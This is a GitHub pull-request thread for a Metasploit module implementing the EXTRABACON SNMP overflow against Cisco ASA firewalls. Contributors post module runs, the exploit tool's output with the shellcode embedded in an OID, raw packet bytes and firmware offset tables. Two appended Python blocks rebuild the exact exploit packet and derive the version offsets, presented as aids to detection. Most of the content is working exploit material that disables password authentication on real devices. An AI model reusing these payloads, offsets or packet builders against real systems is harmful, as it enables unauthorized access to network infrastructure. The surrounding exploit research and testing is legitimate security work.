Conversation

@ghost ghost commented Sep 24, 2016

This includes @bcook-r7's pull request for module documentation and credit to @wwebb-r7.

It is also a new feature branch, as requested.

Closed PR #7353

zerosum0x0 and others added 30 commits September 22, 2016 18:06
This module patches the authentication functions of a Cisco ASA
to allow uncredentialed logins. Uses improved shellcode for payload.
@bcook-r7 bcook-r7 self-assigned this Sep 24, 2016
bcook-r7 pushed a commit to busterb/metasploit-framework that referenced this pull request Sep 24, 2016
@bcook-r7
Contributor

Thanks!

@bcook-r7 bcook-r7 merged commit 90bd2a9 into rapid7:master Sep 24, 2016
bcook-r7 pushed a commit that referenced this pull request Sep 24, 2016
@ghost ghost deleted the extrabacon branch September 24, 2016 16:39
@nixawk (Contributor) commented Sep 26, 2016

@zerosum0x0 @bcook-r7 I've tested the module against my vuln-device, but no luck.

msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed
$ telnet 192.168.206.114
Trying 192.168.206.114...
Connected to 192.168.206.114.
Escape character is '^]'.


User Access Verification

Password:
Password:
Password: Connection closed by foreign host.

@nixawk (Contributor) commented Sep 26, 2016

RiskSense-Ops/CVE-2016-6366 also fails to exploit the vuln-device.

sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ python extrabacon_2.0.py info -t 192.168.206.114 -c public 
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/concernedparent
[+] Executing:  extrabacon_2.0.py info -t 192.168.206.114 -c public
[+] probing target via snmp
[+] Connecting to 192.168.206.114:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['public']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 9.2(1)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[23500L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['ciscoasa']>

[+] firewall uptime is 23500 time ticks, or 0:03:55

[+] firewall name is ciscoasa

[+] target is running 9_2(1), which is supported
Data stored in key file  : 9_2(1)
Data stored in self.vinfo: 9_2(1)

To check the key file to see if it really contains what we're claiming:
# cat /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/keys/ee5t3g.key

To disable password checking on target:
# extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-disable

To enable password checking on target:
# extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-enable
sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ cat /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/keys/ee5t3g.key
9_2(1)
sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ python extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-disable
WARNING: No route found for IPv6 destination :: (no default route?)
Logging to /home/sec/Downloads/CVE-2016-6366/extrabacon-2.0/concernedparent
[+] Executing:  extrabacon_2.0.py exec -k ee5t3g -t 192.168.206.114 -c public --mode pass-disable
Data stored in self.vinfo: 9_2(1)
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./improved
[+] importing version-specific shellcode shellcode_9_2(1)
[+] random SNMP request-id 476275327
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187.0.240.182.9.205.128.88.187.0.80.8.8.205.128.199.5.16.252.182.9.49.192.64.195.199.5.176.84.8.8.49.192.64.195.97.104.54.118.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195.144.144.144.144.144.144.144.197.180.10.8.139.124.36.20.139.7.255.224.144
EXBA msg (200): 3081c502010104067075626c6963a581b702041c63627f0201000201013081a83081a50681a02b060104010909836b010303010105095f31815b3181763181493181406031815281008145108100814207047d50813b008170813609814d810058813b00500808814d810081470510817c81360931814040814381470581305408083181404081436168367627098100814310813f0b0f0f0f81098165810381454881438110811081108110811081108110814581340a08810b7c2414810b07817f816081100500
[+] Connecting to 192.168.206.114:161
[+] packet 1 of 1
[+] 0000   30 81 C5 02 01 01 04 06  70 75 62 6C 69 63 A5 81   0.......public..
[+] 0010   B7 02 04 1C 63 62 7F 02  01 00 02 01 01 30 81 A8   ....cb.......0..
[+] 0020   30 81 A5 06 81 A0 2B 06  01 04 01 09 09 83 6B 01   0.....+.......k.
[+] 0030   03 03 01 01 05 09 5F 31  81 5B 31 81 76 31 81 49   ......_1.[1.v1.I
[+] 0040   31 81 40 60 31 81 52 81  00 81 45 10 81 00 81 42   1.@`1.R...E....B
[+] 0050   07 04 7D 50 81 3B 00 81  70 81 36 09 81 4D 81 00   ..}P.;..p.6..M..
[+] 0060   58 81 3B 00 50 08 08 81  4D 81 00 81 47 05 10 81   X.;.P...M...G...
[+] 0070   7C 81 36 09 31 81 40 40  81 43 81 47 05 81 30 54   |.6.1.@@.C.G..0T
[+] 0080   08 08 31 81 40 40 81 43  61 68 36 76 27 09 81 00   ..1.@@.Cah6v'...
[+] 0090   81 43 10 81 3F 0B 0F 0F  0F 81 09 81 65 81 03 81   .C..?.......e...
[+] 00a0   45 48 81 43 81 10 81 10  81 10 81 10 81 10 81 10   EH.C............
[+] 00b0   81 10 81 45 81 34 0A 08  81 0B 7C 24 14 81 0B 07   ...E.4....|$....
[+] 00c0   81 7F 81 60 81 10 05 00                            ...`....
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['public']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[476275327L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.9.9.720.1.1.1.0']>
   |   |  value     = <ASN1_INTEGER[2L]>
[+] received SNMP id 476275327, matches random id sent, likely success
[+] clean return detected

sec@gpg:~/Downloads/CVE-2016-6366/extrabacon-2.0$ telnet 192.168.206.114
Trying 192.168.206.114...
Connected to 192.168.206.114.
Escape character is '^]'.


User Access Verification

Password: 
Password: 
Password: Connection closed by foreign host.
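
The packet dump in the comment above shows where the payload actually lives: the whole shellcode rides inside the OID of a single GetBulkRequest varbind, one byte per sub-identifier, and the "overflow (112)" line and the "EXBA msg (200)" line are the same data before and after BER encoding. The following is an added example, not code from this PR, from the Metasploit module or from the ExtraBacon tooling, that rebuilds that 200-byte request from the dotted OID and parses it back the way a detection rule would. OVERFLOW_OID, EXBA_MSG_HEX and the request-id are copied from the extrabacon_2.0.py output above; the function names and the 32-arc threshold in suspicious_oids are this example's own choices.

```python
"""Added example, not code from this PR or from the ExtraBacon tooling.
OVERFLOW_OID, EXBA_MSG_HEX and REQUEST_ID are copied from the extrabacon_2.0.py
output quoted above; the functions and the suspicious_oids threshold are mine."""

# "overflow (112)" line from the thread: 112 arcs, the tail is x86 shellcode.
OVERFLOW_OID = (
    "1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.49.219.49.246.49.201.49.192.96.49."
    "210.128.197.16.128.194.7.4.125.80.187.0.240.182.9.205.128.88.187.0.80.8.8."
    "205.128.199.5.16.252.182.9.49.192.64.195.199.5.176.84.8.8.49.192.64.195."
    "97.104.54.118.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195.144."
    "144.144.144.144.144.144.197.180.10.8.139.124.36.20.139.7.255.224.144"
)
# "EXBA msg (200)" line from the thread: the same request as sent on the wire.
EXBA_MSG_HEX = (
    "3081c502010104067075626c6963a581b702041c63627f020100020101"
    "3081a83081a50681a02b060104010909836b010303010105095f31815b"
    "3181763181493181406031815281008145108100814207047d50813b00"
    "8170813609814d810058813b00500808814d810081470510817c813609"
    "31814040814381470581305408083181404081436168367627098100"
    "814310813f0b0f0f0f81098165810381454881438110811081108110"
    "811081108110814581340a08810b7c2414810b07817f816081100500"
)
REQUEST_ID = 476275327   # "random SNMP request-id" from the same run


def ber_len(n: int) -> bytes:
    """BER length octets: short form below 128, long form otherwise."""
    if n < 128:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body

def ber_int(n: int) -> bytes:
    """INTEGER for n >= 0: minimal big-endian octets with the sign bit clear."""
    return tlv(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big"))

def encode_oid(dotted: str) -> bytes:
    """OID content octets. The first two arcs merge into one octet; later arcs
    are base-128 with a continuation bit, so every arc >= 128 (each shellcode
    byte with the high bit set) costs two octets: 112 arcs become 160 octets."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return bytes(out)

def decode_oid(content: bytes) -> str:
    first = content[0]
    arcs = [first // 40, first % 40] if first < 80 else [2, first - 80]
    value, pending = 0, False
    for b in content[1:]:
        value, pending = (value << 7) | (b & 0x7F), bool(b & 0x80)
        if not pending:
            arcs.append(value)
            value = 0
    if pending:
        raise ValueError("truncated sub-identifier")
    return ".".join(map(str, arcs))

def snmp_getbulk(community: bytes, request_id: int, oid: str,
                 non_repeaters: int = 0, max_repetitions: int = 1) -> bytes:
    """SNMPv2c GetBulkRequest (PDU tag 0xA5) carrying one OID/NULL varbind."""
    varbind = tlv(0x30, tlv(0x06, encode_oid(oid)) + b"\x05\x00")
    pdu = (ber_int(request_id) + ber_int(non_repeaters)
           + ber_int(max_repetitions) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(1) + tlv(0x04, community) + tlv(0xA5, pdu))

def read_tlv(data: bytes, pos: int = 0):
    """Return (tag, content, position just past the element)."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def request_oids(packet: bytes) -> list:
    """Every varbind OID in an SNMPv1/v2c Get, GetNext, Set or GetBulk."""
    _, msg, _ = read_tlv(packet)
    _, _, pos = read_tlv(msg)                   # version
    _, _, pos = read_tlv(msg, pos)              # community
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    if pdu_tag not in (0xA0, 0xA1, 0xA3, 0xA5):
        return []
    pos = 0
    for _ in range(3):                          # request-id and two INTEGERs
        _, _, pos = read_tlv(pdu, pos)
    _, vblist, _ = read_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(vblist):
        _, vb, pos = read_tlv(vblist, pos)
        oids.append(decode_oid(read_tlv(vb)[1]))
    return oids

def suspicious_oids(packet: bytes, max_arcs: int = 32) -> list:
    """Detection heuristic (the threshold is my choice, not from the PR):
    real MIB OIDs are short, a request carrying shellcode needs dozens of arcs."""
    return [o for o in request_oids(packet) if o.count(".") + 1 > max_arcs]
```

snmp_getbulk(b"public", REQUEST_ID, OVERFLOW_OID) reproduces the 200 bytes of the "EXBA msg" line exactly, and request_oids() run over those bytes gives back the 112-arc OID, which is the field an IDS rule for this bug has to measure; matching only on the 1.3.6.1.4.1.9.9.491 prefix would fire on ordinary CISCO-FIREWALL-MIB walks as well.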

@nixawk (Contributor) commented Sep 26, 2016

msf auxiliary(snmp_login) > run

[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Please check my pcap - cisco_asa-CVE-2016-6366.zip

@ghost (Author) commented Sep 26, 2016

@nixawk we tested it against SSH on 9.2(1) and verified it worked originally. I will reload that version in about 1 hour and re-test. We have never tested against telnet, but from my understanding it uses the same authentication functions that the shellcode patches. It isn't crashing the ASA, which means the shellcode should actually be doing something and the offsets are correct.

Going forward I may experiment with reverse TCP shelling it directly with the shellcode. I've read it's not a straightforward payload for ASA devices, but it seems to have standard Linux syscalls? We have 82 bytes to play with, which should be plenty. If we need more, it will have to calculate the offset to the third stage, use an egg hunter, or perhaps just overflow a couple more stack frames and do extra cleanup. The problem with calculating the offset to the third stage is that even the Equation Group code seems unstable. It worked for me on 8.4(3) but not 8.2(3).

@ghost (Author) commented Sep 26, 2016

@nixawk we tested and confirmed both the Metasploit module and ExtraBacon 2.0 Python code worked on 9.2(1) for both SSH and Telnet.

Can you extract the lina file and run lina-offsets.py on it and see if the offsets match?

https://software.cisco.com/download/release.html?mdfid=280582808&softwareid=280775065&release=9.2.1.ED&relind=AVAILABLE&rellifecycle=&reltype=latest

9.2.1.ED

zerosum0x0@localhost ~/Downloads> sha256sum asa921-k8.bin
07d9fd8f32dab7c663649f0932cc058fb3bdc5771c134324183d1eeeaaae8ef0  asa921-k8.bin

binwalk -e asa921-k8.bin

cd _asa921-k8.bin.extracted/; cpio -idv < rootfs.img

zerosum0x0@localhost ~/D/_asa921-k8.bin.extracted> ~/CVE-2016-6366/lina-offsets.py asa/bin/lina
{u'after': 2, u'name': u'ADMAUTH', u'oneshot': False, 'found': [{'operation': 'push   ebp', 'bytes': '55', 'address': '80854b0'}, {'operation': 'mov    ebp,esp', 'bytes': '89 e5', 'address': '80854b1'}, {'operation': 'push   edi', 'bytes': '57', 'address': '80854b3'}], u'type': u'BEFORE', u'find': [u'c7 45 f0 01 00 00 00', u'66 c7 45 ?? c1 10'], u'match': u'55', u'before': 0}
{u'after': 0, u'name': u'JMPESP', u'oneshot': True, 'found': [{'operation': 'jmp    80a99c8 <XML_SetCommentHandler@plt+0x5aff0>', 'bytes': 'e9 ff e4 ff ff', 'address': '80ab4c4'}], u'type': u'EXACT', u'find': [u'ff e4'], u'match': u'ff e4', u'before': 0}
{u'after': 0, u'name': u'VULNFUNC', u'oneshot': False, 'found': [{'operation': 'push   ebp', 'bytes': '55', 'address': '9276440'}], u'type': u'BEFORE', u'find': [u'89 e5', u'57', u'56', u'53', u'83 ec 6c', u'a1 ?? ?? ?? ??', u'8b 5d 1c', u'85 c0', u'0f 84 ?? ?? ?? ??', u'8b 03'], u'match': u'55', u'before': 0}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   9276440 <svcerr_weakauth@@Base+0x17d5a0>', 'bytes': 'e8 0a ee ff ff', 'address': '9277631'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '9277636'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   92763d0 <svcerr_weakauth@@Base+0x17d530>', 'bytes': 'e8 d1 e1 ff ff', 'address': '92781fa'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '92781ff'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   92763c0 <svcerr_weakauth@@Base+0x17d520>', 'bytes': 'e8 e1 dd ff ff', 'address': '92785da'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '92785df'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   927a570 <svcerr_weakauth@@Base+0x1816d0>', 'bytes': 'e8 6b b1 ff ff', 'address': '927f400'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '927f405'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   9299b60 <svcerr_weakauth@@Base+0x1a0cc0>', 'bytes': 'e8 29 ef ff ff', 'address': '929ac32'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '929ac37'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 0, u'name': u'SAFE_RET', u'oneshot': False, 'found': [{'operation': 'call   929a1c0 <svcerr_weakauth@@Base+0x1a1320>', 'bytes': 'e8 54 f1 ff ff', 'address': '929b067'}, {'operation': 'test   eax,eax', 'bytes': '85 c0', 'address': '929b06c'}], u'type': u'AFTER', u'find': [u'8b 45 e4', u'89 44 24 18', u'8b 45 ??', u'89 44 24 14', u'8b 45 ec', u'89 44 24 10', u'8b ?? 10', u'89 ?? 24 08', u'89 ?? 24 0c', u'8b ?? 14', u'89 ?? 24 04', u'8b ?? 18', u'89 ?? 24', u'e8 ?? ?? ff ff', u'85 c0', u'--', u'a3 ?? ?? ?? ??', u'0f 84 ?? ?? ?? ??'], u'match': u'85 c0', u'before': 1}
{u'after': 2, u'name': u'PMCHECK', u'oneshot': False, 'found': [{'operation': 'push   ebp', 'bytes': '55', 'address': '9b6fc10'}, {'operation': 'xor    eax,eax', 'bytes': '31 c0', 'address': '9b6fc11'}, {'operation': 'mov    ebp,esp', 'bytes': '89 e5', 'address': '9b6fc13'}], u'type': u'BEFORE', u'find': [u'8b 75 08', u'89 7d fc', u'8b 16', u'85 d2'], u'match': u'55', u'before': 0}
saferet_offset  = "54.118.39.9"     # 0x09277636
jmp_esp_offset  = "197.180.10.8"        # 0x080ab4c5
admauth_offset  = "176.84.8.8"      # 0x080854b0
admauth_bounds  = "0.80.8.8"        # 0x08085000
admauth_code    = "85.137.229.87"       # 0x5589e557
pmcheck_offset  = "16.252.182.9"        # 0x09b6fc10
pmcheck_bounds  = "0.240.182.9"     # 0x09b6f000
pmcheck_code    = "85.49.192.137"       # 0x5531c089
fix_ebp = "72"      # 0x48
#"VERS" => ["197.180.10.8", "54.118.39.9", "72", "0.240.182.9", "16.252.182.9", "85.49.192.137", "0.80.8.8", "176.84.8.8", "85.137.229.87"]
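
The constants at the end of the comment above are the lina-offsets.py hits re-expressed as dotted-decimal OID arcs, which is how the payload has to carry them. The following is an added example, not code from this PR, from the module or from lina-offsets.py, that derives each of the nine values from the hits and checks the result against the VERS line. LINA_HITS is a trimmed copy of the 9.2(1) output quoted above, the 0x48 fix_ebp value is taken from the same comment (the offsets script does not produce it), and reading the *_bounds and *_code values as sanity checks the shellcode performs before patching is this example's assumption.

```python
"""Added example, not code from this PR, from the module or from
lina-offsets.py. LINA_HITS is a trimmed copy of the 9.2(1) lina-offsets.py
output quoted above; FIX_EBP is the 0x48 constant from the same comment."""
import struct

LINA_HITS = {
    "ADMAUTH": [{"bytes": "55", "address": "80854b0"},
                {"bytes": "89 e5", "address": "80854b1"},
                {"bytes": "57", "address": "80854b3"}],
    "JMPESP": [{"bytes": "e9 ff e4 ff ff", "address": "80ab4c4"}],
    "SAFE_RET": [{"bytes": "e8 0a ee ff ff", "address": "9277631"},
                 {"bytes": "85 c0", "address": "9277636"}],
    "PMCHECK": [{"bytes": "55", "address": "9b6fc10"},
                {"bytes": "31 c0", "address": "9b6fc11"},
                {"bytes": "89 e5", "address": "9b6fc13"}],
}
FIX_EBP = 0x48   # stack-frame adjustment from the comment above, not derived


def dotted_le32(addr: int) -> str:
    """A 32-bit address as four OID arcs in little-endian byte order, the form
    in which the OID payload carries pointers (0x09277636 -> 54.118.39.9)."""
    return ".".join(str(b) for b in struct.pack("<I", addr))

def dotted_bytes(raw: bytes) -> str:
    """Raw code bytes as arcs in memory order, no endian swap."""
    return ".".join(str(b) for b in raw)

def hits_bytes(found: list) -> bytes:
    return bytes.fromhex("".join(h["bytes"] for h in found).replace(" ", ""))

def function_constants(found: list) -> tuple:
    """(page base, address, first four prologue bytes) of a patched function.
    Assumption of this example: the module's *_bounds and *_code values are
    what the shellcode compares against before it patches the function."""
    addr = int(found[0]["address"], 16)
    return addr & ~0xFFF, addr, hits_bytes(found)[:4]

def jmp_esp_address(found: list) -> int:
    """The 'ff e4' hit sits inside a 5-byte 'jmp rel32' (e9 ff e4 ff ff), so
    the usable gadget is the hit address plus the offset of those two bytes."""
    for h in found:
        raw = bytes.fromhex(h["bytes"].replace(" ", ""))
        i = raw.find(b"\xff\xe4")
        if i >= 0:
            return int(h["address"], 16) + i
    raise ValueError("no jmp esp in hits")

def safe_ret_address(found: list) -> int:
    """The 'test eax,eax' right after the call into the vulnerable function:
    returning there resumes the caller as if the call had returned normally."""
    for h in found:
        if h["bytes"].replace(" ", "") == "85c0":
            return int(h["address"], 16)
    raise ValueError("no test eax,eax in hits")

def vers_entry(hits: dict, fix_ebp: int = FIX_EBP) -> list:
    """The nine strings in the order the VERS line above uses."""
    pm_bounds, pm_addr, pm_code = function_constants(hits["PMCHECK"])
    ad_bounds, ad_addr, ad_code = function_constants(hits["ADMAUTH"])
    return [
        dotted_le32(jmp_esp_address(hits["JMPESP"])),
        dotted_le32(safe_ret_address(hits["SAFE_RET"])),
        str(fix_ebp),
        dotted_le32(pm_bounds), dotted_le32(pm_addr), dotted_bytes(pm_code),
        dotted_le32(ad_bounds), dotted_le32(ad_addr), dotted_bytes(ad_code),
    ]
```

vers_entry(LINA_HITS) returns exactly the nine strings of the VERS line above. Running the same derivation over the lina-offsets.py output from a different build is the quickest way to answer the question in the comment: if any of the nine strings differ from the module's table, the shellcode is patching the wrong addresses on that image.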

@tdoan-r7 (Contributor)

@bcook-r7 please write release notes!

@bcook-r7 (Contributor)

Release Notes

This module implements the EXTRABACON exploit for Cisco ASA VPN appliances. The exploit works by disabling authentication remotely via a specially-crafted SNMP packet. This was originally part of the Equation Group disclosure made by Shadow Brokers. It supports a variety of firmware versions from 8.x to 9.x.

Labels

feature module rn-enhancement release notes enhancement
